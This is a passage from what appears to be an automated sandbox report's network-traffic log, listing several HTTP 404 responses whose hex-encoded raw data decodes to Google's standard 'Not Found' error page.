70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Sat, 16 Jul 2022 21:57:55 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Sat, 16 Jul 2022 21:57:58 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Sat, 16 Jul 2022 21:58:00 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Sat, 16 Jul 2022 21:58:03 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Sat, 16 Jul 2022 21:58:05 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Sat, 16 Jul 2022 21:58:07 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 